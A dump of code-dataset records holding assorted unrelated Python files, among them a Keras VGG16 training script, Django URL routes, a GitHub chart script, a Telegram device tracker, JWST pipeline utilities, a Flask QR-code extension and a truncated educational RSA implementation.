tf.keras.optimizers.SGD(learning_rate= i[1], momentum=0.0, nesterov=False, name='SGD')\n\n VGG16_cnn_model.compile(loss = i[0],\n optimizer = sgd,\n metrics = ['accuracy'])\n \n model_summary = VGG16_cnn_model.summary()\n print(model_summary)\n\n\n ############################################################\n # Train Model:\n ############################################################\n\n batch_size = 128\n training_size = 2148\n testing_size = 538\n epochs = 5\n\n fn_steps_per_epoch = lambda x: int(math.ceil(1. * x / batch_size))\n steps_per_epoch = fn_steps_per_epoch(training_size)\n test_steps = fn_steps_per_epoch(testing_size)\n\n # Extract dataset from folder:\n train_datagen = ImageDataGenerator(rescale = 1/255)\n test_datagen = ImageDataGenerator(rescale = 1/255)\n\n # get training images\n train_gen = train_datagen.flow_from_directory(\n r'.\\cleaned_data\\train',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # get testing images\n test_gen = test_datagen.flow_from_directory(\n r'.\\cleaned_data\\test',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # train model\n history = VGG16_cnn_model.fit(\n train_gen,\n steps_per_epoch = steps_per_epoch,\n epochs = epochs,\n validation_data = test_gen,\n validation_steps = test_steps\n )\n\n ############################################################\n # Export Model to working Directory:\n ############################################################\n\n model_name_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1])\n model_weights_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1] + \"_weights\")\n\n VGG16_cnn_model.save(model_name_loc)\n VGG16_cnn_model.save_weights(model_weights_loc) \n\n","sub_path":"scripts/train_VGG16.py","file_name":"train_VGG16.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"423170572","text":"# coding=utf-8\n\nimport pandas as pd\n\n\nclass MzData:\n def read(self, csv: str,\n start_symbol: str=\"s\", goal_symbol: str=\"g\", flag_symbol: str=\"f\"):\n df = pd.read_csv(csv, dtype='str', index_col='row')\n self.shape = df.shape\n\n df_fg = df == flag_symbol\n df_start = df == start_symbol\n df_goal = df == goal_symbol\n self.flags = []\n self.walls = []\n\n for row in range(-1, df.shape[0]+1):\n for col in range(-1, df.shape[1]+1):\n if 0 <= row < df.shape[0] and 0 <= col < df.shape[1]:\n pass\n else:\n self.walls.append([row, col])\n\n for row in range(df.shape[0]):\n for col in range(df.shape[1]):\n if df_fg.iat[row, col]:\n self.flags.append([row, col])\n if df_start.iat[row, col]:\n self.start = [row, col]\n if df_goal.iat[row, col]:\n self.goal = [row, col]","sub_path":"maze/mz_data.py","file_name":"mz_data.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"437475388","text":"from config.config import mongo\n\nclass Dampak():\n __schema = {\n \"kppn\": \"156\",\n \"level\": \"\",\n \"level_desc\": \"\",\n \"area_dampak\": {\n \"fraud\": \"\",\n \"non_fraud\": \"\"\n },\n \"reputasi\": [],\n \"sanksi\": \"\",\n \"kecelakaan\": \"\",\n \"gangguan\": \"\",\n \"kinerja\": \"\"\n }\n\n\n def find(self):\n try:\n query = mongo.db.dampak.find()\n except:\n raise Exception('db connection error')\n \n parsed_cursor = []\n\n for parsed in query:\n parsed['_id'] = str(parsed['_id'])\n parsed_cursor.append(parsed)\n\n return parsed_cursor\n\n\n def insert(self, dampak_object):\n try:\n mongo.db.dampak.insert(dampak_object)\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n\n def update(self, dampak_object):\n try:\n mongo.db.dampak.update(dampak_object['query'], dampak_object['data'])\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n def delete(self, delete_criteria):\n try:\n mongo.db.dampak.delete_one(delete_criteria)\n except:\n raise Exception('db connection error')\n\n return {\n \"status\": \"success\"\n }","sub_path":"models/dampak.py","file_name":"dampak.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"525502701","text":"from datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\n\nimport app.forms\nimport app.views\nfrom django.conf.urls import include\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', app.views.home, name='home'),\n url(r'^saskaita', app.views.SaskaitaView.as_view(), name='saskaita'),\n url(r'^duomenys', app.views.DuomenysView.as_view(), name='duomenys'),\n url(r'^nurasymas', app.views.NurasymasView.as_view(), name='nurasymas'),\n url(r'^ruosiniai', app.views.RuosiniaiView.as_view(), name='ruosiniai'),\n url(r'^account', app.views.AccountView.as_view(), name='account'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title': 'PVM saskaitu tvarkymo sistema',\n 'year': datetime.now().year,\n }\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n url(r'^admin/', include(admin.site.urls))\n]\n","sub_path":"Python/Python_5/DjangoWebsite/DjangoWebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"98253736","text":"import requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as LCS, LightenStyle as LS\n\n#执行API调用并存储相应\nurl = 'https://api.github.com/search/repositories?q=language:python&sort=stars'\nr = requests.get(url)\nprint(\"Status code:\", r.status_code) #状态码200表示成功\n\nresponse_dict = r.json() # 将API响应为json格式,转换为python字典\nprint(\"Total repositories: \",response_dict['total_count']) #GitHub包含py仓库总数\n\nrepo_dicts=response_dict[\"items\"] #返回的仓库字典的列表\n\nnames, plot_dicts=[],[] \nfor repo_dict in repo_dicts:\n names.append(repo_dict[\"name\"])\n plot_dict={\"value\":repo_dict[\"stargazers_count\"], \n \"label\":str(repo_dict[\"description\"]),\n \"xlink\":str(repo_dict[\"html_url\"])} #注意这里的str函数\n plot_dicts.append(plot_dict)\n\n#可视化\nmy_style = LS('#333366', base_style=LCS)\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15 #缩减长标签为15字符,鼠标悬停显示全称\nmy_config.show_y_guides = False #隐去水平虚线\nmy_config.width = 1000\nchart = pygal.Bar(my_config, style=my_style)\nchart.title = 'Most-Starred Python Projects on GitHub'\nchart.x_labels = names\nchart.add('', plot_dicts)\nchart.render_to_file('python_repos2.svg')","sub_path":"mycodes/chapter17/python_repos2.py","file_name":"python_repos2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"10229585","text":"import sys\nsys.stdin = open(\"4_이진힙\", \"r\")\n\ndef insert(n):\n # 일단 바로 뒤에 넣고, 최소힙이니까, 부모보다 작으면 계속 올라가야함\n G.append(nums[n])\n p = n # 내 위치를 p에 저장하고\n # 내 위치가 0보다 크면서 부모가 나보다 크면 바꿔야함\n while(p > 0 and G[p//2] > G[p]): # 만약 부모가 더 크면 => 부모와 위치 바꿔\n temp = G[p//2]\n G[p//2] = G[p]\n G[p] = temp\n p = p//2 # 그리고 이제 내위치가 부모위치, 그럼 또 그 위의 부모랑 비교해서 올라가야함\n\nT = int(input())\nfor t in range(1, T+1):\n n = int(input())\n nums = list(map(int, input().split()))\n nums.insert(0,0)\n G = [0]\n\n for i in range(1, n+1):\n # 리스트가 비어있으면 그냥 첫번째에 넣고\n if i == 1 :\n G.append(nums[i])\n # 아니면 앞의 노드들과 비교해서 넣어야함\n else: insert(i)\n\n sum1 = 0\n p = len(G)-1\n while p > 0:\n sum1 += G[p//2]\n p = p//2\n print(f\"#{t} {sum1}\")\n\n\n\n","sub_path":"day16-Tree/4_이진힙.py","file_name":"4_이진힙.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"442801303","text":"import json\nfrom backends.abstract_backend import AbstractBackend\n\nFILENAME = 'links_db.json'\n\n\nclass JSONBackend(AbstractBackend):\n def __init__(self):\n super().__init__()\n self._load_data()\n\n def _load_data(self):\n try:\n with open(FILENAME) as file:\n self.storage = json.load(file)\n except FileNotFoundError:\n self.storage = {}\n\n def close(self):\n with open(FILENAME, 'w') as file:\n json.dump(self.storage, file, indent=2)\n","sub_path":"Lesson10/backends/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"162480012","text":"#!/usr/bin/env python3.7\n\"\"\"Google certified android devices tracker\"\"\"\n\nimport difflib\nimport json\nfrom datetime import date\nfrom os import rename, path, system, environ\nfrom requests import get, post\n\nGIT_OAUTH_TOKEN = environ['GIT_OAUTH_TOKEN_XFU']\nBOT_TOKEN = environ['bottoken']\nTODAY = str(date.today())\n\n\ndef fetch():\n \"\"\"\n Download latest and convert to utf-8\n \"\"\"\n url = \"http://storage.googleapis.com/play_public/supported_devices.csv\"\n response = get(url)\n data = (response.content.decode('utf-16'))\n data_list = list(data.split('\\n'))\n with open('README.md', 'w', encoding=\"utf-8\") as markdown,\\\n open('devices.json', 'w') as json_out:\n markdown.write('# Google Play Certified Android devices\\n')\n markdown.write('Last sync is {}\\n\\nhttps://support.google.com/googleplay/'\n 'answer/1727131?hl=en\\n\\n'.format(TODAY))\n markdown.write('|Retail Branding|Marketing Name|Device|Model|\\n')\n markdown.write('|---|---|---|---|\\n')\n devices = []\n for line in data_list[1:]:\n i = line.strip().replace(\" \", \" \").split(\",\")\n try:\n brand = i[0]\n name = i[1]\n device = i[2]\n model = i[3]\n markdown.write('|{}|{}|{}|{}|\\n'.format(brand, name, device, model))\n devices.append({'brand': brand, 'name': name, 'device': device, 'model': model})\n except IndexError:\n pass\n json.dump(devices, json_out, indent=1)\n\n\ndef diff_files():\n \"\"\"\n diff\n \"\"\"\n with open('old.md', 'r') as old, open('README.md', 'r') as new:\n diff = difflib.unified_diff(old.readlines(), new.readlines(), fromfile='old', tofile='new')\n changes = []\n for line in diff:\n if line.startswith('+'):\n changes.append(str(line))\n new = ''.join(changes[2:]).replace(\"+\", \"\")\n with open('changes', 'w') as out:\n out.write(new)\n\n\ndef post_to_tg():\n \"\"\"\n post new devices to telegram channel\n \"\"\"\n # tg\n telegram_chat = \"@CertifiedAndroidDevices\"\n with open('changes', 'r') as changes:\n for line in changes:\n info = line.split(\"|\")\n brand = info[1]\n name = info[2]\n codename = info[3]\n model = info[4]\n telegram_message = f\"New certified device added!: \\n\" \\\n f\"Brand: *{brand}*\\n\" \\\n f\"Name: *{name}*\\n\" \\\n f\"*Codename:* `{codename}`\\n\" \\\n f\"Model: *{model}*\"\n params = (\n ('chat_id', telegram_chat),\n ('text', telegram_message),\n ('parse_mode', \"Markdown\"),\n ('disable_web_page_preview', \"yes\")\n )\n telegram_url = \"https://api.telegram.org/bot\" + BOT_TOKEN + \"/sendMessage\"\n telegram_req = post(telegram_url, params=params)\n telegram_status = telegram_req.status_code\n if telegram_status == 200:\n print(\"{0}: Telegram Message sent\".format(name))\n else:\n print(\"Telegram Error\")\n\n\ndef git_commit_push():\n \"\"\"\n git add - git commit - git push\n \"\"\"\n system(\"git add README.md devices.json && git -c \\\"user.name=XiaomiFirmwareUpdater\\\" \"\n \"-c \\\"user.email=xiaomifirmwareupdater@gmail.com\\\" \"\n \"commit -m \\\"[skip ci] sync: {0}\\\" && \"\" \\\n \"\"git push -q https://{1}@github.com/androidtrackers/\"\n \"certified-android-devices.git HEAD:master\"\n .format(TODAY, GIT_OAUTH_TOKEN))\n\n\ndef main():\n \"\"\"\n certified-android-devices tracker\n \"\"\"\n if path.exists('README.md'):\n rename('README.md', 'old.md')\n fetch()\n diff_files()\n post_to_tg()\n git_commit_push()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"189601553","text":"from .base import FunctionalTest\n\nclass InspectGameTest(FunctionalTest):\n def select_message_node(self, svg_circle_element):\n svg_circle_element.find_element_by_xpath(\"..\").click()\n\n def test_inspect_game(self):\n \"\"\"Marcus looks at the results of an ongoing game.\"\"\"\n game_name = 'In Progress Game'\n self.create_game(game_name, nchains=4, depth=4)\n\n # Marcus goes to the games list and inspects the game\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He sees the nodes rendered on the svg element\n nodes = self.select_svg_nodes()\n # 1 game node, 4 chain nodes, and each chain has 1 seed and 4 children\n expected_num_nodes = 1 + 4 + (4 * 5)\n self.assertEquals(len(nodes), expected_num_nodes)\n\n def test_close_chain(self):\n \"\"\"Marcus decides to close a branch.\"\"\"\n game_name = 'Dead End Game'\n self.create_game(game_name, nchains=1, depth=1)\n\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He selects one of the child nodes.\n nodes = self.select_svg_nodes()\n expected_num_nodes = 1 + 1 + 2\n self.assertEquals(len(nodes), expected_num_nodes)\n\n message_nodes = self.select_message_nodes()\n self.assertEquals(len(message_nodes), 2)\n\n seed_message = message_nodes[0]\n self.select_message_node(seed_message)\n\n # He presses the button to edit it.\n\n # He changes the number of children to 0.\n\n # He saves his changes.\n\n # The node now shows that it is rejected, and that it is closed.\n","sub_path":"ftests/test_inspect_game.py","file_name":"test_inspect_game.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"367389777","text":"\"\"\"\nThis script tests the savings from using lru cache.\n\"\"\"\n\nimport functools\n\nclass MyVision:\n counter = 0\n\n @functools.lru_cache(maxsize=int(2**8))\n def my_dummy_calc(self, x, y, z):\n if x.x > y.x:\n return self.my_dummy_calc(y, x, z)\n self.counter+=1\n return x\n\nfrom collections import namedtuple\n\nquack = namedtuple(\"quack\", \"x y\")\n\nm = MyVision()\n\nquacks = list()\nfor i in range(8):\n for j in range(8):\n quacks.append( quack(i,j) )\n\nimport random\n\nresults = []\n\nqs = quacks[:5]\n\nwhile len(results) < 500_000:\n if random.random() < 0.9:\n q1 = random.choice(qs)\n q2 = random.choice(qs)\n q3 = random.choice(qs)\n\n else:\n q1 = random.choice(quacks)\n q2 = random.choice(quacks)\n q3 = random.choice(quacks)\n\n results.append(m.my_dummy_calc(q1,q2,q3))\n\nprint(m.counter)\n\n\n\n","sub_path":"tests/_conceptual/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"45471059","text":"# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nUtilities\n\"\"\"\nfrom copy import copy\nfrom importlib import import_module\nimport inspect\nimport logging\nimport os\nimport re\nimport sys\n\nfrom . import entry_points\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# Step classes that are not user-api steps\nNON_STEPS = [\n 'EngDBLogStep',\n 'FunctionWrapper',\n 'Pipeline',\n 'Step',\n 'SystemCall',\n]\n\n\ndef resolve_step_class_alias(name):\n \"\"\"\n If the input is a recognized alias, return the\n corresponding fully-qualified class name. Otherwise\n return the input unmodified.\n\n Parameters\n ----------\n name : str\n\n Returns\n -------\n str\n \"\"\"\n for info in entry_points.get_steps():\n if info.class_alias is not None and name == info.class_alias:\n return info.class_name\n\n return name\n\n\ndef import_class(full_name, subclassof=object, config_file=None):\n \"\"\"\n Import the Python class `full_name` given in full Python package format,\n e.g.::\n\n package.another_package.class_name\n\n Return the imported class. Optionally, if `subclassof` is not None\n and is a Python class, make sure that the imported class is a\n subclass of `subclassof`.\n \"\"\"\n # Understand which class we need to instantiate. The class name is given in\n # full Python package notation, e.g.\n # package.subPackage.subsubpackage.className\n # in the input parameter `full_name`. This means that\n # 1. We HAVE to be able to say\n # from package.subPackage.subsubpackage import className\n # 2. If `subclassof` is defined, the newly imported Python class MUST be a\n # subclass of `subclassof`, which HAS to be a Python class.\n\n if config_file is not None:\n sys.path.insert(0, os.path.dirname(config_file))\n\n try:\n full_name = full_name.strip()\n package_name, sep, class_name = full_name.rpartition('.')\n if not package_name:\n raise ImportError(\"{0} is not a Python class\".format(full_name))\n imported = __import__(\n package_name, globals(), locals(), [class_name, ], level=0)\n\n step_class = getattr(imported, class_name)\n\n if not isinstance(step_class, type):\n raise TypeError(\n 'Object {0} from package {1} is not a class'.format(\n class_name, package_name))\n elif not issubclass(step_class, subclassof):\n raise TypeError(\n 'Class {0} from package {1} is not a subclass of {2}'.format(\n class_name, package_name, subclassof.__name__))\n finally:\n if config_file is not None:\n del sys.path[0]\n\n return step_class\n\n\ndef get_spec_file_path(step_class):\n \"\"\"\n Given a Step (sub)class, divine and return the full path to the\n corresponding spec file. Use the fact that by convention, the spec\n file is in the same directory as the `step_class` source file. It\n has the name of the Step (sub)class and extension .spec.\n \"\"\"\n try:\n step_source_file = inspect.getfile(step_class)\n except TypeError:\n return None\n step_source_file = os.path.abspath(step_source_file)\n\n # Since `step_class` could be defined in a file called whatever,\n # we need the source file basedir and the class name.\n dir = os.path.dirname(step_source_file)\n return os.path.join(dir, step_class.__name__ + '.spec')\n\n\ndef find_spec_file(step_class):\n \"\"\"\n Return the full path of the given Step subclass `step_class`, if\n it exists or None if it does not.\n \"\"\"\n spec_file = get_spec_file_path(step_class)\n if spec_file is not None and os.path.exists(spec_file):\n return spec_file\n return None\n\n\ndef islist_tuple(obj):\n \"\"\"\n Return True if `obj` is either a list or a tuple. False otherwise.\n \"\"\"\n return isinstance(obj, tuple) or isinstance(obj, list)\n\n\ndef all_steps():\n \"\"\"List all classes subclassed from Step\n\n Returns\n -------\n steps : dict\n Key is the classname, value is the class\n \"\"\"\n from jwst.stpipe import Step\n\n jwst = import_module('jwst')\n jwst_fpath = os.path.split(jwst.__file__)[0]\n\n steps = {}\n for module in load_local_pkg(jwst_fpath):\n more_steps = {\n klass_name: klass\n for klass_name, klass in inspect.getmembers(\n module,\n lambda o: inspect.isclass(o) and issubclass(o, Step)\n )\n if klass_name not in NON_STEPS\n }\n steps.update(more_steps)\n\n return steps\n\n\ndef load_local_pkg(fpath):\n \"\"\"Generator producing all modules under fpath\n\n Parameters\n ----------\n fpath: string\n File path to the package to load.\n\n Returns\n -------\n generator\n `module` for each module found in the package.\n \"\"\"\n package_fpath, package = os.path.split(fpath)\n package_fpath_len = len(package_fpath) + 1\n sys_path = copy(sys.path)\n sys.path.insert(0, package_fpath)\n try:\n for module_fpath in folder_traverse(\n fpath, basename_regex=r'[^_].+\\.py$', path_exclude_regex='tests'\n ):\n folder_path, fname = os.path.split(module_fpath[package_fpath_len:])\n module_path = folder_path.split('/')\n module_path.append(os.path.splitext(fname)[0])\n module_path = '.'.join(module_path)\n try:\n module = import_module(module_path)\n except Exception as err:\n logger.debug(f'Cannot load module \"{module_path}\": {str(err)}')\n else:\n yield module\n except Exception as err:\n logger.debug(f'Cannot complete package loading: Exception occurred: \"{str(err)}\"')\n finally:\n sys.path = sys_path\n\n\ndef folder_traverse(folder_path, basename_regex='.+', path_exclude_regex='^$'):\n \"\"\"Generator of full file paths for all files\n in a folder.\n\n Parameters\n ----------\n folder_path: str\n The folder to traverse\n\n basename_regex: str\n Regular expression that must match\n the `basename` part of the file path.\n\n path_exclude_regex: str\n Regular expression to exclude a path.\n\n Returns\n -------\n generator\n A generator, return the next file.\n \"\"\"\n basename_regex = re.compile(basename_regex)\n path_exclude_regex = re.compile(path_exclude_regex)\n for root, dirs, files in os.walk(folder_path):\n if path_exclude_regex.search(root):\n continue\n for file in files:\n if basename_regex.match(file):\n yield os.path.join(root, file)\n","sub_path":"jwst/stpipe/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"241486437","text":"import os\nfrom sys import platform, stdout\nfrom time import sleep\n\n\n#-------------------------------------------\n# Logic Functions\nfrom getText import *\nfrom slowPrint import *\nfrom printLines import *\nfrom clearScreen import *\nfrom changeScreenSize import *\n\n\n# \"Waiting\" animation with dots. Allows control over the number of dots in each cycle, the amount of cycles, and the time between each dot.\ndef waitingDots(num_of_dots, num_of_loops, dot_speed, char):\n l = 0\n str = char * num_of_dots # All dots in 1 string\n while l < num_of_loops:\n for char in str: # Print each character in str with dot_speed amount of time in between\n print(char, end=\"\", flush=\"True\")\n sleep(dot_speed)\n for char in str: # Go back one space and clear it for each dot\n stdout.write(\"\\b\" * num_of_dots)\n stdout.write(\" \" * num_of_dots)\n stdout.write(\"\\b\" * num_of_dots)\n l = l + 1\n\n\n#-------------------------------------------\n# Story functions\n\nfrom story import *\n\n\n#-------------------------------------------\n# Start script\n\nchangeScreenSize(66, 38)\n\nprint(getText(\"txtimgs/tree.txt\"))\nprint(getText(\"txtimgs/helloyou.txt\"))\ninput(\"Press [ENTER] to start...\")\n\nsleep(1)\n\nchangeScreenSize(50, 4)\n\ntitle = \"Verhaal van een nieuwkomer\".center(50, \"-\")\nprint(\"\\n\"+title)\nloading = \"[»-(¯`·.·´¯)->...LOADING...<-(¯`·.·´¯)-«]\".center(50)\nslowPrint(loading, 0.01, 0.13)\nslowPrint(\"...\", 0.8, 0.8)\n\nchangeScreenSize(100, 25)\n\n\n#-------------------------------------------\n# Explanation\n\nprint('')\nprint(\"Uitleg\".center(100, \"-\"))\nsleep(0.5)\nprint('\\n\\n')\nprint('- Het spel bestaat uit stukjes verhaal (\"secties\") en vragen;'.center(100))\nsleep(1.5)\nprint('- Bij elke vraag kun je A, B en soms C antwoorden;'.center(100))\nsleep(1.5)\nprint('- De keuzes die je maakt beïnvloeden hoe het verhaal verloopt. Maak je keuzes aandachtig.'.center(100))\nsleep(2.5)\n\nx = input('\\n\\n\\n\\n\\n\\nOm het spel te starten, druk op [ENTER]. Om de credits te bekijken, typ \"credits\".\\n')\n\nclearScreen()\n\nif x.lower() == \"credits\":\n\n print('\\n')\n print('Credits'.center(100, \"-\"))\n print('\\n\\nDit keuzeverhaal spel is gemaakt door Mavis de Ridder uit klas SD1C van het Mediacollege Amsterdam, als eind-beroepsopdracht voor periode 1, jaar 1.')\n print('\\n\\nDe GitHub link voor dit project is: [https://github.com/pinkflamey/HelloYou]')\n\n input('Druk op [ENTER] om het spel te starten...')\n clearScreen()\n t1()\n \nelse:\n\n clearScreen()\n t1()","sub_path":"python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"550547647","text":"n=int(input())\r\nflag=0\r\na=[]\r\ntf=[]\r\nvalue=0\r\nfor i in range(n):\r\n a=[]\r\n fine=0\r\n months=int(input())\r\n x=input()\r\n value=x.find('0')\r\n if value>=0:\r\n x=x[value:]\r\n a=x.split(' ')\r\n fine=0\r\n for j in a:\r\n j=int(j)\r\n if j==0:\r\n fine=fine+1100\r\n elif j==1:\r\n fine=fine+100\r\n tf.append(fine)\r\nfor k in tf:\r\n print(k,end=\"\\n\")\r\n \r\n","sub_path":"chefapr1.py","file_name":"chefapr1.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"330686330","text":"\"\"\"\nSupport PY3,Use BytesIO instead of StringIO\n\"\"\"\nfrom io import BytesIO\nimport base64\n\nfrom flask import render_template, Blueprint, Markup, url_for\nimport qrcode as qrc\n\ncorrection_levels = {\n 'L': qrc.constants.ERROR_CORRECT_L,\n 'M': qrc.constants.ERROR_CORRECT_M,\n 'Q': qrc.constants.ERROR_CORRECT_Q,\n 'H': qrc.constants.ERROR_CORRECT_H\n}\n\n\ndef qrcode(data, version=None, error_correction='L', box_size=10, border=0, fit=True):\n # makes qr image using qrcode as qrc\n qr = qrc.QRCode(\n version=version,\n error_correction=correction_levels[error_correction],\n box_size=box_size,\n border=border\n )\n qr.add_data(data)\n qr.make(fit=fit)\n\n # creates qrcode base64\n # io = StringIO()\n sio = BytesIO()\n qr_img = qr.make_image()\n qr_img.save(sio)\n return \"data:image/png;base64,\" + base64.b64encode(sio.getvalue()).decode()\n\n\nclass QRcode(object):\n\n def __init__(self, app=None, **kwargs):\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n self.register_blueprint(app)\n app.add_template_filter(qrcode)\n app.add_template_global(qrcode)\n\n def register_blueprint(self, app):\n module = Blueprint('qrcode',\n __name__,\n template_folder='templates')\n app.register_blueprint(module)\n return module\n","sub_path":"flask_qrcode/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"396433903","text":"# RSA implementation based on http://code.activestate.com/recipes/577737-public-key-encryption-rsa/\n\nfrom random import randrange\nfrom collections import namedtuple\nfrom math import log\nfrom base64 import b64encode, b64decode\n\nPRIME_LOWER_BOUND = 10e3\nPRIME_UPPER_BOUND = 10e6\n\nKeyPair = namedtuple(\"KeyPair\", \"public private\")\nKey = namedtuple(\"Key\", \"exp mod\")\n\n# https://en.wikipedia.org/wiki/Euclidean_algorithm\ndef gcd(a, b):\n \"\"\"Retorna o maior divisor comum de a e b.\"\"\"\n while b != 0:\n a, b = b, a % b\n return a\n\ndef lcm(a, b):\n \"\"\"Retorna o menor múltiplo comum de a e b.\"\"\"\n return (a * b) // gcd(a, b)\n\n# https://en.wikipedia.org/wiki/Modular_expiation\ndef modular_pow(base, exp, mod):\n \"\"\"Retorna o valor de base elevado a exp no módulo mod.\"\"\"\n if mod == 1:\n return 0\n result = 1\n base = base % mod\n while exp > 0:\n if exp % 2 == 1:\n result = (result * base) % mod\n exp = exp // 2\n base = (base * base) % mod\n return result\n\n# https://en.wikipedia.org/wiki/Primality_test\ndef is_prime_naive(n):\n \"\"\"Retorna se o número n é primo. Implementação 'ingênua'.\"\"\"\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True\n\n# https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test\ndef is_prime(n, k=30):\n \"\"\"Retorna se o número n é primo. Algoritmo de Miller-Rabin.\n O parâmetro k corresponde à acurácia do teste.\"\"\"\n\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n \n # escrever n-1 com d*(2^s), onde d é ímpar\n s, d = 0, n-1\n while d % 2 == 0:\n s, d = s + 1, d // 2\n assert (2 ** s) * d == n-1 and d % 2 == 1\n\n for i in range(k):\n a = randrange(2, n-1)\n x = modular_pow(a, d, n)\n if x == 1 or x == n-1:\n continue\n for r in range(1, s):\n x = (x * x) % n\n if x == 1:\n return False\n if x == n-1:\n break\n else:\n return False\n \n return True\n\ndef random_prime(lower, upper):\n \"\"\"Retorna um número primo no intervalo [lower, upper).\"\"\"\n p = 1\n while not is_prime(p):\n p = randrange(lower, upper)\n return p\n\n# http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm\ndef multiplicative_inverse(a, mod):\n \"\"\"Retorna o inverso multiplicativo de a no módulo mod.\n É necessário que a e mod sejam primos entre si.\"\"\"\n assert gcd(a, mod) == 1\n\n x0, x1 = 0, 1\n r0, r1 = mod, a\n\n while r1 != 0:\n q = r0 // r1\n x0, x1 = x1, x0 - q * x1\n r0, r1 = r1, r0 - q * r1\n \n if x0 < 0:\n x0 += mod\n\n assert (x0 * a) % mod == 1\n\n return x0\n\ndef generate_keys(verbose=False):\n \"\"\"Gera chaves pública e secreta de acordo com o algoritmo RSA.\n Caso verbose seja verdadeiro, imprime parâmetros do algoritmo no console.\"\"\"\n\n 